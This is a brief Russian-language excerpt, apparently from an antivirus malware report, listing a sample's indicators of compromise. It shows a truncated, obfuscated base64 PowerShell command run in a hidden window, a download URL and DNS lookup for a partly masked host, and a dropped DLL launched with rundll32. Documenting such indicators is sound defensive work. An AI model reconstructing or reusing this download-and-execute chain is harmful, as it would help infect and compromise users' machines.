Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD cwBFAHQALQBWAEEAUgBJAEEAYgBMAEUAIABXAEsAMQAgACgAWwBUAFkAcABFAF0AKAAiAHsAMQB9AHsANQB9AHsAMgB9AHsANAB9AHsAMAB9AHsAMwB9ACIALQBmACAAJwBJAFIARQAnACwAJwBTAHkAUwBUACcALAAnAC4AaQ...
- %HOMEPATH%\bx06ayy\qm1luf0\kgj3a6o.dll
- http://cu###m.robi2.hu/r0779g.zip
- DNS ASK cu###m.robi2.hu
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD cwBFAHQALQBWAEEAUgBJAEEAYgBMAEUAIABXAEsAMQAgACgAWwBUAFkAcABFAF0AKAAiAHsAMQB9AHsANQB9AHsAMgB9AHsANAB9AHsAMAB9AHsAMwB9ACIALQBmACAAJwBJAFIARQAnACwAJwBTAHkAUwBUACcALAAnAC4AaQ...' (со скрытым окном)
- '<SYSTEM32>\rundll32.exe' %HOMEPATH%\Bx06ayy\Qm1luf0\Kgj3a6o.dll 0